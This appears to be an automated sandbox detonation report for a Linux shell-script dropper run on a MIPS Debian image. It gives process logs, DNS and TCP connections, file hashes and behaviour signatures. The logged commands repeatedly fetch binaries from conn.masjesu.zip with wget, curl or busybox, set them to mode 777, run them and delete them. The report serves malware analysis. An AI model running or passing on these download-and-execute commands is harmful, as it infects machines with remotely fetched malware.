[wget http://conn.masjesu.zip/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I]

/bin/chmod

[chmod 777 jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I]

/tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I

[./jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I]

/bin/rm

[rm jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc]

/bin/chmod

[chmod 777 Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc]

/tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc

[./Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc]

/bin/rm

[rm Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa]

/bin/chmod

[chmod 777 Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa]

/tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa

[./Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa]

/bin/rm

[rm Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj]

/bin/chmod

[chmod 777 ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj]

/tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj

[./ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj]

/bin/rm

[rm ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]

/bin/chmod

[chmod 777 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]

/tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH

[./07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]

/bin/rm

[rm 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF]

/bin/chmod

[chmod 777 XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF]

/tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF

[./XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF]

/bin/rm

[rm XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG]

/bin/chmod

[chmod 777 He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG]

/tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG

[./He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG]

/bin/rm

[rm He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS]

/bin/chmod

[chmod 777 cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS]

/tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS

[./cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS]

/bin/rm

[rm cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c]

/bin/chmod

[chmod 777 mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c]

/tmp/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c

[./mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c]

/bin/rm

[rm mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk]

/bin/chmod

[chmod 777 HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk]

/tmp/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk

[./HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk]

/bin/rm

[rm HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp

Files

/tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-28 02:44

Reported

2024-10-28 02:47

Platform

debian9-mipsel-20240226-en

Max time kernel

150s

Max time network

154s

Command Line

[/tmp/6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH N/A
N/A /tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF /tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF N/A
N/A /tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG /tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG N/A
N/A /tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS /tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS N/A
N/A /tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj /tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj N/A
N/A /tmp/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c /tmp/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c N/A
N/A /tmp/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk /tmp/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk N/A
N/A /tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN /tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN N/A
N/A /tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v /tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v N/A
N/A /tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb /tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb N/A
N/A /tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I /tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I N/A
N/A /tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28 /tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28 N/A
N/A /tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc /tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc N/A
N/A /tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa /tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa N/A
N/A /tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28 /tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28 N/A
N/A /tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN /tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN N/A
N/A /tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v /tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v N/A
N/A /tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb /tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb N/A
N/A /tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I /tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I N/A
N/A /tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc /tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc N/A
N/A /tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa /tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa N/A
N/A /tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj /tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj N/A
N/A /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH N/A
N/A /tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF /tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF N/A
N/A /tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG /tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG N/A
N/A /tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS /tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj /usr/bin/curl N/A
File opened for modification /tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb /usr/bin/curl N/A
File opened for modification /tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN /usr/bin/curl N/A
File opened for modification /tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v /usr/bin/curl N/A
File opened for modification /tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb /usr/bin/curl N/A
File opened for modification /tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc /usr/bin/curl N/A
File opened for modification /tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS /usr/bin/curl N/A
File opened for modification /tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF /usr/bin/curl N/A
File opened for modification /tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS /usr/bin/curl N/A
File opened for modification /tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28 /usr/bin/curl N/A
File opened for modification /tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc /usr/bin/curl N/A
File opened for modification /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH /usr/bin/curl N/A
File opened for modification /tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG /usr/bin/curl N/A
File opened for modification /tmp/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk /usr/bin/curl N/A
File opened for modification /tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v /usr/bin/curl N/A
File opened for modification /tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I /usr/bin/curl N/A
File opened for modification /tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa /usr/bin/curl N/A
File opened for modification /tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj /usr/bin/curl N/A
File opened for modification /tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG /usr/bin/curl N/A
File opened for modification /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH /usr/bin/curl N/A
File opened for modification /tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN /usr/bin/curl N/A
File opened for modification /tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I /usr/bin/curl N/A
File opened for modification /tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa /usr/bin/curl N/A
File opened for modification /tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28 /usr/bin/curl N/A
File opened for modification /tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF /usr/bin/curl N/A
File opened for modification /tmp/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c /usr/bin/curl N/A

Processes

/tmp/6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244.sh

[/tmp/6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]

/usr/bin/curl

